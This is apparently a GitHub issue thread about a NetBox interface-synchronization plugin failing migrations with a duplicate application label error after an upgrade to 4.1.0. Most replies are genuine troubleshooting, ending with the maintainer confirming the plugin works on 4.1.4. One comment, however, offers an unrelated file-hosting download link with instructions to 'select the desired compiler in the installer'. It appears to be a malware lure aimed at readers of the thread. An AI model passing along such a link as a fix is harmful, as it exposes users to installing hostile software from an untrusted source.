### ISSUE TITLE
Issue with Netbox 4.1.0?

### ISSUE THREAD

**Issue by bradmoutoux** [NetTech2001/netbox-interface-synchronization#9]
Upon upgrading from Netbox 4.0.10 to 4.1.0 I got a python error when doing the migrations:
ImproperlyConfigured: Application labels aren't unique, duplicates: netbox_interface_synchronization
  File "manage.py", line 10, in <module>
    execute_from_command_line(sys.argv)

The error never popped when upgrading to 4.0.8, 4.0.9, or 4.0.10.

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by bmhughes** [comment]
Same problem here, trying to narrow it down

**Comment by elixdreamer** [comment]
would like to see 4.1 support too. any updates on getting this working?

**Comment by NetTech2001** [comment]
I am running 4.1.2 and its working on my instance, though I did run into the error @bradmoutoux mentioned when I was also using the BGP plugin which is currently unsupported in 4.1 so I had to disable that plugin.

**Comment by NetTech2001** [comment]
Confirmed working on version 4.1.4
